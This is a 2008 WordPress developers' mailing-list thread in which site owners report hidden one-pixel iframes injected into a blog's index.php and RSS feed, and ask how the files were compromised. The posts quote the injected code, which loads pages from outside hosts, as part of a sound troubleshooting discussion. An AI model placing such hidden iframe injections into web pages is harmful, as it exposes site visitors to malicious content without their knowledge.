[wp-hackers] XSS vuln in wordpress 2.7 ?
mikeschinkel at gmail.com
Mon Dec 22 18:09:19 GMT 2008
I have a client I just started working with who had the same problem only
the offending line was this (and it showed up on several files, including
their RSS feed):
<iframe src="http://hosttracker.net/?click=5715531" width=1 height=1
Not sure what to make of it...
----- Original Message -----
From: "madalin" <niladam at gmail.com>
To: wp-hackers at lists.automattic.com
Sent: Monday, December 22, 2008 12:59:37 PM GMT -05:00 US/Canada Eastern
Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
Me and only one friend have access to the server.
On Mon, Dec 22, 2008 at 7:33 PM, Joost de Valk <joost at yoast.com> wrote:
> If the file is writable for the webserver and file access is enabled on
> webserver: yes.
> Joost de Valk
> joost at yoast.com
> Sent from my iPhone
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>> Wow. That's nasty, and malicious. Could a plugin do that?
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>> For some reason i found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\<http://thedeadpit.com/?click=17470781%5C>"
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> I tried looking at the logs. No luck. The file's permisions look like
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>> I'm still trying to figure out how that line got there. I've
>>> downloaded wordpress right from wordpress.org, and the server is a
>>> dedicated one, only two users with shell access to it.
>>> Any suggestions ?
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
wp-hackers mailing list
wp-hackers at lists.automattic.com
More information about the wp-hackers